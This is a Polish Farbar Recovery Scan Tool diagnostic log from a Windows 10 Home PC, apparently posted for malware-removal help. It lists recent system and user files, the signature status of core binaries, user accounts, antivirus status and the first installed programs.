2017-04-12 11:10 - 2017-03-28 07:24 - 19416576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-04-12 11:10 - 2017-03-28 07:21 - 23681536 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-04-12 11:10 - 2017-03-28 07:21 - 01589760 _____ (Microsoft Corporation) C:\WINDOWS\system32\msdtctm.dll
2017-04-12 11:10 - 2017-03-28 07:18 - 12181504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-04-12 11:10 - 2017-03-28 07:17 - 13087232 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-04-12 11:10 - 2017-03-28 07:14 - 08126976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-04-12 11:10 - 2017-03-28 07:13 - 06045184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2017-04-12 11:10 - 2017-03-28 07:13 - 04474368 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2017-04-12 11:10 - 2017-03-28 07:12 - 05611008 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll
2017-04-12 11:10 - 2017-03-28 07:06 - 01121280 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2017-04-12 11:09 - 2017-03-28 08:36 - 01617760 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2017-04-12 11:09 - 2017-03-28 08:36 - 01294688 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2017-04-12 11:09 - 2017-03-28 08:36 - 00565088 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2017-04-12 11:09 - 2017-03-28 08:36 - 00343904 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2017-04-12 11:09 - 2017-03-28 08:36 - 00142176 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2017-04-12 11:09 - 2017-03-28 08:35 - 00379232 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2017-04-12 11:09 - 2017-03-28 08:20 - 00764392 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2017-04-12 11:09 - 2017-03-28 08:10 - 00178528 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostUser.dll
2017-04-12 11:09 - 2017-03-28 08:10 - 00146776 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostCommon.dll
2017-04-12 11:09 - 2017-03-28 08:09 - 02446704 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll
2017-04-12 11:09 - 2017-03-28 08:09 - 00682816 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2017-04-12 11:09 - 2017-03-28 08:09 - 00624048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2017-04-12 11:09 - 2017-03-28 08:08 - 01100128 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2017-04-12 11:09 - 2017-03-28 08:08 - 00989024 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2017-04-12 11:09 - 2017-03-28 08:00 - 01569184 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2017-04-12 11:09 - 2017-03-28 08:00 - 00628552 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2017-04-12 11:09 - 2017-03-28 07:58 - 00372440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.MediaControl.dll
2017-04-12 11:09 - 2017-03-28 07:38 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll
2017-04-12 11:09 - 2017-03-28 07:37 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblAuthManagerProxy.dll
2017-04-12 11:09 - 2017-03-28 07:36 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll
2017-04-12 11:09 - 2017-03-28 07:36 - 00045056 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2017-04-12 11:09 - 2017-03-28 07:35 - 00156160 _____ (Microsoft Corporation) C:\WINDOWS\system32\Family.Client.dll
2017-04-12 11:09 - 2017-03-28 07:35 - 00124416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.SystemManagement.dll
2017-04-12 11:09 - 2017-03-28 07:34 - 00259072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Family.SyncEngine.dll
2017-04-12 11:09 - 2017-03-28 07:34 - 00162304 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmcertinst.exe
2017-04-12 11:09 - 2017-03-28 07:34 - 00129536 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_ClosedCaptioning.dll
2017-04-12 11:09 - 2017-03-28 07:34 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblAuthTokenBrokerExt.dll
2017-04-12 11:09 - 2017-03-28 07:33 - 00196096 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDeviceRegistration.dll
2017-04-12 11:09 - 2017-03-28 07:33 - 00193536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.WiFi.dll
2017-04-12 11:09 - 2017-03-28 07:33 - 00122880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryClient.dll
2017-04-12 11:09 - 2017-03-28 07:33 - 00101888 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDeviceRegistration.Ngc.dll
2017-04-12 11:09 - 2017-03-28 07:33 - 00082432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.UserDeviceAssociation.dll
2017-04-12 11:09 - 2017-03-28 07:32 - 00368640 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneBackupHandler.dll
2017-04-12 11:09 - 2017-03-28 07:32 - 00186368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Radios.dll
2017-04-12 11:09 - 2017-03-28 07:31 - 00547840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Input.dll
2017-04-12 11:09 - 2017-03-28 07:31 - 00289792 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeveloperOptionsSettingsHandlers.dll
2017-04-12 11:09 - 2017-03-28 07:31 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudDomainJoinDataModelServer.dll
2017-04-12 11:09 - 2017-03-28 07:30 - 00651264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.AllJoyn.dll
2017-04-12 11:09 - 2017-03-28 07:30 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserMgrProxy.dll
2017-04-12 11:09 - 2017-03-28 07:30 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBrokerUI.dll
2017-04-12 11:09 - 2017-03-28 07:29 - 00852480 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Import.dll
2017-04-12 11:09 - 2017-03-28 07:29 - 00391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleacc.dll
2017-04-12 11:09 - 2017-03-28 07:29 - 00379904 _____ (Microsoft Corporation) C:\WINDOWS\system32\apprepsync.dll
2017-04-12 11:09 - 2017-03-28 07:29 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.LockScreen.dll
2017-04-12 11:09 - 2017-03-28 07:29 - 00267264 _____ (Microsoft Corporation) C:\WINDOWS\system32\vaultcli.dll
2017-04-12 11:09 - 2017-03-28 07:29 - 00206336 _____ (Microsoft Corporation) C:\WINDOWS\system32\psmsrv.dll
2017-04-12 11:09 - 2017-03-28 07:29 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2017-04-12 11:09 - 2017-03-28 07:29 - 00146432 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthBroker.dll
2017-04-12 11:09 - 2017-03-28 07:28 - 00407552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll
2017-04-12 11:09 - 2017-03-28 07:28 - 00176128 _____ (Microsoft Corporation) C:\WINDOWS\system32\apprepapi.dll
2017-04-12 11:09 - 2017-03-28 07:27 - 01060352 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppContracts.dll
2017-04-12 11:09 - 2017-03-28 07:27 - 00645120 _____ (Microsoft Corporation) C:\WINDOWS\system32\qedit.dll
2017-04-12 11:09 - 2017-03-28 07:27 - 00091136 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll
2017-04-12 11:09 - 2017-03-28 07:26 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\system32\deviceaccess.dll
2017-04-12 11:09 - 2017-03-28 07:25 - 01010176 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2017-04-12 11:09 - 2017-03-28 07:25 - 00966144 _____ (Microsoft Corporation) C:\WINDOWS\system32\sbe.dll
2017-04-12 11:09 - 2017-03-28 07:25 - 00896512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.AccountsControl.dll
2017-04-12 11:09 - 2017-03-28 07:25 - 00775168 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2017-04-12 11:09 - 2017-03-28 07:24 - 00410112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2017-04-12 11:09 - 2017-03-28 07:23 - 00073728 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSManMigrationPlugin.dll
2017-04-12 11:09 - 2017-03-28 07:19 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\dlnashext.dll
2017-04-12 11:09 - 2017-03-28 07:16 - 00167936 _____ (Microsoft Corporation) C:\WINDOWS\system32\ErrorDetails.dll
2017-04-12 11:09 - 2017-03-28 07:16 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\system32\vss_ps.dll
2017-04-12 11:09 - 2017-03-28 07:15 - 00139776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Devices.dll
2017-04-12 11:09 - 2017-03-28 07:14 - 01643008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Speech.dll
2017-04-12 11:09 - 2017-03-28 07:14 - 00869888 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2017-04-12 11:09 - 2017-03-28 07:13 - 01359872 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2017-04-12 11:09 - 2017-03-28 07:13 - 00460800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Midi.dll
2017-04-12 11:09 - 2017-03-28 07:12 - 00376832 _____ (Microsoft Corporation) C:\WINDOWS\system32\CryptoWinRT.dll
2017-04-12 11:09 - 2017-03-28 07:11 - 02914816 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnroll.dll
2017-04-12 11:09 - 2017-03-28 07:10 - 01586176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Globalization.dll
2017-04-12 11:09 - 2017-03-28 07:09 - 01064448 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2017-04-12 11:09 - 2017-03-28 07:09 - 00716800 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShareHost.dll
2017-04-12 11:09 - 2017-03-28 07:08 - 00180224 _____ (Microsoft Corporation) C:\WINDOWS\system32\enrollmentapi.dll
2017-04-12 11:09 - 2017-03-16 06:47 - 00038768 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompPkgSup.dll
2017-04-12 11:08 - 2017-03-28 08:08 - 01267504 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2017-04-12 11:08 - 2017-03-28 08:04 - 01600632 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
2017-04-12 11:08 - 2017-03-28 07:44 - 07216640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2017-04-12 11:08 - 2017-03-28 07:23 - 09130496 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-04-12 11:08 - 2017-03-28 07:17 - 05114368 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdp.dll
2017-04-12 11:08 - 2017-03-28 07:17 - 04749312 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2017-04-12 11:08 - 2017-03-28 07:14 - 01692160 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-04-12 11:08 - 2017-03-28 07:10 - 02316288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-04-12 11:08 - 2017-03-28 07:08 - 03612672 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-04-12 11:08 - 2017-03-28 07:08 - 03542016 _____ (Microsoft Corporation) C:\WINDOWS\system32\actxprxy.dll
2017-04-12 11:08 - 2017-03-18 18:50 - 00956416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2017-04-12 11:08 - 2017-03-18 18:35 - 02278400 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-04-09 13:49 - 2015-07-09 03:11 - 699688757 _____ C:\Users\Emil\Desktop\Wesele Malwiny i Emila.mp4
2017-04-09 01:32 - 2017-04-09 01:32 - 02146080 _____ C:\Users\Emil\Desktop\bITH 09.04.17.flp
2017-04-09 00:25 - 2017-04-09 00:25 - 00001553 _____ C:\Users\Emil\Desktop\FL Studio 12.lnk
2017-04-09 00:25 - 2017-04-09 00:25 - 00000000 ____D C:\VstPlugins
2017-04-09 00:16 - 2017-04-09 00:16 - 00000000 ____D C:\sylenthhh
2017-04-09 00:16 - 2017-04-09 00:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sylenth1
2017-04-09 00:14 - 2017-04-09 00:14 - 00000000 ____D C:\Users\Emil\Downloads\Lennar_Digital_Sylenth1_V2.2.1_Windows_8_Fix_130_Presets
2017-04-09 00:12 - 2017-04-09 00:25 - 00000000 ____D C:\FL Studio 12.4.2
2017-04-08 23:56 - 2017-04-08 23:57 - 00000000 ____D C:\Users\Emil\AppData\Local\Runefall
2017-04-08 23:53 - 2017-04-08 23:53 - 00000000 ____D C:\Users\Emil\AppData\Roaming\ZOG
2017-04-07 21:44 - 2017-04-07 21:44 - 00004244 _____ C:\WINDOWS\System32\Tasks\Opera scheduled Autoupdate 1491594233
2017-04-07 21:44 - 2017-04-07 21:44 - 00000000 ____D C:\Users\Emil\AppData\Roaming\Opera Software
2017-04-07 21:44 - 2017-04-07 21:44 - 00000000 ____D C:\Users\Emil\AppData\Local\Opera Software
2017-04-07 21:44 - 2017-04-07 21:43 - 00001353 _____ C:\Users\Emil\Desktop\Opera.lnk
2017-04-07 21:44 - 2017-04-07 21:43 - 00001353 _____ C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Opera.lnk
2017-04-07 21:43 - 2017-04-11 23:30 - 00000000 ____D C:\ProgramData\AVAST Software
2017-04-07 21:42 - 2017-04-17 15:32 - 00002246 _____ C:\Users\Emil\Desktop\WarThunder.lnk
2017-04-07 21:42 - 2017-04-09 21:43 - 00000000 ____D C:\Users\Emil\AppData\Roaming\WarThunder
2017-04-07 21:42 - 2017-04-07 21:42 - 00000000 ____D C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WarThunder
2017-04-02 23:15 - 2017-04-02 23:15 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus
2017-04-02 08:15 - 2017-04-02 08:15 - 00087904 _____ (Microsoft Corporation) C:\WINDOWS\system32\UNPUXWorker.exe
2017-03-30 10:15 - 2017-03-30 10:15 - 08072454 _____ C:\Users\Emil\Downloads\1140221_UVA0bgXyghxVJudRzuqAcEXz.pdf
2017-03-29 12:39 - 2017-03-29 12:39 - 00000000 ____D C:\Users\Emil\Downloads\Energy 2000 Mix Vol. 5 - Katowice Edition 2017

==================== Jeden miesiąc - zmodyfikowane pliki i foldery ========

(Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.)

2017-04-24 13:40 - 2017-03-01 12:11 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2017-04-24 13:40 - 2016-11-25 17:27 - 00000000 __SHD C:\Users\Emil\IntelGraphicsProfiles
2017-04-24 13:39 - 2017-03-01 12:13 - 00000000 ____D C:\ProgramData\NVIDIA
2017-04-24 13:39 - 2016-11-21 11:06 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-04-24 13:39 - 2016-07-16 08:04 - 00524288 _____ C:\WINDOWS\system32\config\BBI
2017-04-24 12:25 - 2016-11-25 17:48 - 00000000 ____D C:\Users\Emil\AppData\Local\CrashDumps
2017-04-24 12:21 - 2017-02-27 14:58 - 00000000 ____D C:\ProgramData\Adobe
2017-04-24 12:17 - 2016-11-21 02:06 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2017-04-22 13:08 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\appraiser
2017-04-22 12:56 - 2016-11-21 11:16 - 02062200 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-04-22 12:56 - 2016-11-21 10:34 - 00788298 _____ C:\WINDOWS\system32\perfh015.dat
2017-04-22 12:56 - 2016-11-21 10:34 - 00172862 _____ C:\WINDOWS\system32\perfc015.dat
2017-04-22 12:53 - 2016-08-18 09:23 - 00000000 ___HD C:\Intel
2017-04-22 12:51 - 2016-05-05 18:09 - 00000000 ____D C:\Program Files (x86)\McAfee
2017-04-22 12:51 - 2016-05-05 18:08 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-04-22 12:03 - 2016-07-16 13:47 - 00000000 ___HD C:\Program Files\WindowsApps
2017-04-20 12:44 - 2017-03-01 12:20 - 00000000 ____D C:\Users\Emil
2017-04-19 19:13 - 2017-03-20 17:25 - 00002065 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2017-04-19 19:13 - 2017-02-13 23:32 - 00002462 _____ C:\Users\Emil\Desktop\Mozilla Firefox.lnk
2017-04-19 19:12 - 2016-12-01 00:59 - 00000000 ____D C:\Program Files (x86)\Farm Expert 2017
2017-04-19 18:57 - 2016-11-25 21:19 - 00000000 ____D C:\Users\Emil\AppData\Roaming\DAEMON Tools Lite
2017-04-19 18:44 - 2016-11-25 17:34 - 00000000 ____D C:\Users\Emil\AppData\Roaming\Mozilla
2017-04-19 18:43 - 2016-11-25 17:27 - 00000000 ____D C:\Users\Emil\AppData\Local\Packages
2017-04-19 18:41 - 2016-11-25 17:36 - 00000000 ____D C:\Users\Emil\AppData\Local\NVIDIA Corporation
2017-04-19 18:37 - 2017-03-21 21:28 - 00000000 ____D C:\Users\Emil\AppData\Roaming\OpenFM
2017-04-19 18:37 - 2017-03-21 21:28 - 00000000 ____D C:\Users\Emil\AppData\Local\OpenFM
2017-04-19 18:37 - 2017-03-01 12:05 - 00000000 ___DC C:\WINDOWS\Panther
2017-04-19 18:37 - 2017-02-27 14:57 - 00000000 ____D C:\Users\Emil\AppData\Roaming\ScreenShot
2017-04-19 18:37 - 2017-02-03 17:07 - 00000000 ____D C:\Program Files (x86)\My Connection
2017-04-19 18:37 - 2016-12-28 22:01 - 00000000 ____D C:\Users\Emil\AppData\Roaming\GG
2017-04-19 18:37 - 2016-12-28 22:01 - 00000000 ____D C:\Users\Emil\AppData\Local\GG
2017-04-19 18:37 - 2016-11-26 00:03 - 00000000 ____D C:\Users\Emil\AppData\Local\tkdata
2017-04-19 18:37 - 2016-11-25 23:51 - 00000000 ____D C:\Program Files\TrueKey
2017-04-19 18:37 - 2016-11-25 17:41 - 00000000 ____D C:\Users\Emil\AppData\Local\MicrosoftEdge
2017-04-19 18:37 - 2016-11-25 17:27 - 00000000 ____D C:\Users\Emil\AppData\Local\NVIDIA
2017-04-19 18:37 - 2016-08-18 07:52 - 00000000 ____D C:\WINDOWS\NAPP_Dism_Log
2017-04-19 18:37 - 2016-07-16 13:47 - 00000000 __RSD C:\WINDOWS\Media
2017-04-19 18:37 - 2016-07-16 13:47 - 00000000 ___SD C:\WINDOWS\SysWOW64\DiagSvcs
2017-04-19 18:37 - 2016-07-16 13:47 - 00000000 ___SD C:\WINDOWS\SysWOW64\Configuration
2017-04-19 18:37 - 2016-07-16 13:47 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2017-04-19 18:37 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\SysWOW64\setup
2017-04-19 18:37 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI
2017-04-19 18:37 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed
2017-04-19 18:37 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\SysWOW64\Com
2017-04-19 18:37 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\security
2017-04-19 18:37 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\Registration
2017-04-19 18:37 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\InputMethod
2017-04-19 18:37 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\Help
2017-04-19 18:37 - 2016-07-16 13:47 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2017-04-19 18:37 - 2016-07-16 13:45 - 00000000 ____D C:\WINDOWS\INF
2017-04-19 18:37 - 2016-05-05 18:53 - 00000000 ___HD C:\OEM
2017-04-19 18:03 - 2016-11-26 00:02 - 00001243 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\True Key.lnk
2017-04-19 17:48 - 2017-03-21 21:28 - 00001258 _____ C:\Users\Emil\Desktop\OpenFM.lnk
2017-04-18 11:10 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\NDF
2017-04-17 15:30 - 2016-07-16 08:04 - 00032768 _____ C:\WINDOWS\system32\config\ELAM
2017-04-15 23:34 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\rescache
2017-04-12 21:26 - 2016-11-21 11:19 - 00000000 __RHD C:\Users\Public\AccountPictures
2017-04-12 19:09 - 2016-11-21 02:05 - 00337768 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-04-12 19:07 - 2016-07-16 13:47 - 00000000 ___SD C:\WINDOWS\SysWOW64\F12
2017-04-12 19:07 - 2016-07-16 13:47 - 00000000 ___SD C:\WINDOWS\system32\F12
2017-04-12 19:07 - 2016-07-16 13:47 - 00000000 ___RD C:\Program Files\Windows Defender
2017-04-12 19:07 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\setup
2017-04-12 19:07 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\ShellExperiences
2017-04-12 19:07 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\Provisioning
2017-04-12 19:07 - 2016-07-16 13:47 - 00000000 ____D C:\Program Files\Windows Photo Viewer
2017-04-12 19:07 - 2016-07-16 13:47 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2017-04-12 19:07 - 2016-07-16 13:47 - 00000000 ____D C:\Program Files (x86)\Windows Defender
2017-04-12 19:07 - 2016-07-16 08:04 - 00000000 ____D C:\WINDOWS\system32\Dism
2017-04-12 11:37 - 2016-11-25 22:07 - 00000000 ____D C:\WINDOWS\system32\MRT
2017-04-12 11:34 - 2016-11-25 22:07 - 148601744 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-04-12 01:04 - 2017-02-19 02:11 - 00000000 ____D C:\Users\Emil\Downloads\Pompa
2017-04-12 01:04 - 2017-02-19 02:09 - 00000000 ____D C:\Users\Emil\Downloads\Pobrane
2017-04-11 23:30 - 2016-05-05 18:09 - 00000000 ____D C:\Program Files\Common Files\AV
2017-04-09 00:25 - 2016-11-26 01:19 - 00001569 _____ C:\Users\Emil\Desktop\FL Studio 12 (64bit).lnk
2017-04-09 00:25 - 2016-11-26 01:07 - 00000000 ____D C:\Program Files (x86)\Image-Line
2017-04-09 00:21 - 2016-11-26 01:18 - 00000000 ____D C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Image-Line
2017-04-09 00:21 - 2016-11-26 01:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Image-Line
2017-04-08 23:53 - 2016-05-05 18:08 - 00000000 ____D C:\ProgramData\WildTangent
2017-04-08 23:51 - 2016-11-25 17:43 - 00002412 ____N C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WildTangent Games App - wildgames.lnk
2017-04-08 23:51 - 2016-05-05 18:08 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2017-04-08 23:50 - 2016-05-05 18:08 - 00000000 ____D C:\Program Files (x86)\WildTangent Games
2017-04-08 23:29 - 2017-03-17 16:24 - 00532136 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2017-04-08 22:44 - 2016-11-26 01:22 - 00000000 ____D C:\Program Files (x86)\ASIO4ALL v2
2017-04-08 21:15 - 2017-01-28 08:55 - 00000000 ____D C:\Users\Emil\Desktop\Proje
2017-04-06 22:27 - 2016-11-25 23:50 - 00000000 ____D C:\Users\Emil\AppData\Local\Adobe
2017-04-06 21:47 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\Macromed
2017-04-02 23:15 - 2017-02-05 23:51 - 00002013 _____ C:\Users\Public\Desktop\McAfee Security Scan Plus.lnk
2017-04-02 23:15 - 2016-11-26 00:21 - 00000000 ____D C:\Program Files\McAfee Security Scan
2017-04-01 20:52 - 2016-07-16 13:49 - 00835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2017-04-01 20:52 - 2016-07-16 13:49 - 00177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2017-03-31 07:42 - 2016-08-18 07:58 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
2017-03-29 09:15 - 2016-05-05 18:09 - 00000000 ____D C:\ProgramData\McAfee
2017-03-28 08:20 - 2016-11-21 11:11 - 02717184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2017-03-28 02:46 - 2017-03-23 00:29 - 01110594 _____ C:\Users\Emil\Desktop\bitch new.flp

==================== Pliki w katalogu głównym wybranych folderów =======

2017-03-01 12:12 - 2017-03-01 12:12 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

==================== Bamital & volsnap ======================

(Brak automatycznej naprawy dla plików które nie przeszły weryfikacji.)

C:\WINDOWS\system32\winlogon.exe => Plik podpisany cyfrowo
C:\WINDOWS\system32\wininit.exe => Plik podpisany cyfrowo
C:\WINDOWS\explorer.exe => Plik podpisany cyfrowo
C:\WINDOWS\SysWOW64\explorer.exe => Plik podpisany cyfrowo
C:\WINDOWS\system32\svchost.exe => Plik podpisany cyfrowo
C:\WINDOWS\SysWOW64\svchost.exe => Plik podpisany cyfrowo
C:\WINDOWS\system32\services.exe => Plik podpisany cyfrowo
C:\WINDOWS\system32\User32.dll => Plik podpisany cyfrowo
C:\WINDOWS\SysWOW64\User32.dll => Plik podpisany cyfrowo
C:\WINDOWS\system32\userinit.exe => Plik podpisany cyfrowo
C:\WINDOWS\SysWOW64\userinit.exe => Plik podpisany cyfrowo
C:\WINDOWS\system32\rpcss.dll => Plik podpisany cyfrowo
C:\WINDOWS\system32\dnsapi.dll => Plik podpisany cyfrowo
C:\WINDOWS\SysWOW64\dnsapi.dll => Plik podpisany cyfrowo
C:\WINDOWS\system32\Drivers\volsnap.sys => Plik podpisany cyfrowo

LastRegBack: 2017-04-12 16:11

==================== Koniec  FRST.txt ============================


Addition
Kod: Zaznacz wszystko
Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja: 23-04-2017 01
Uruchomiony przez Emil (24-04-2017 13:45:17)
Uruchomiony z C:\Users\Emil\Downloads
Windows 10 Home Wersja 1607 (X64) (2017-03-01 10:49:12)
Tryb startu: Normal
==========================================================


==================== Konta użytkowników: =============================

Administrator (S-1-5-21-2400838556-3398951076-1685541893-500 - Administrator - Disabled)
Emil (S-1-5-21-2400838556-3398951076-1685541893-1001 - Administrator - Enabled) => C:\Users\Emil
Gość (S-1-5-21-2400838556-3398951076-1685541893-501 - Limited - Disabled)
Konto domyślne (S-1-5-21-2400838556-3398951076-1685541893-503 - Limited - Disabled)

==================== Centrum zabezpieczeń ========================

(Załączenie wejścia w fixlist spowoduje jego usunięcie.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: McAfee  — ochrona antywirusowa i przed oprogramowaniem szpiegującym (Disabled - Up to date) {8BCDACFA-D264-3528-5EF8-E94FD0BC1FBC}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: McAfee  — ochrona antywirusowa i przed oprogramowaniem szpiegującym (Disabled - Up to date) {30AC4D1E-F45E-3AA6-6448-D23DAB3B5501}
FW: McAfee Firewall (Disabled) {B3F62DDF-980B-3470-75A7-407A2E6F58C7}

==================== Zainstalowane programy ======================

(W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.)

12 Labours of Hercules III: Girl Power (x32 Version: 3.0.2.118 - WildTangent) Hidden
abFiles (HKLM-x32\...\{13885028-098C-4799-9B71-27DAC96502D5}) (Version: 2.03.2003 - Acer Incorporated)
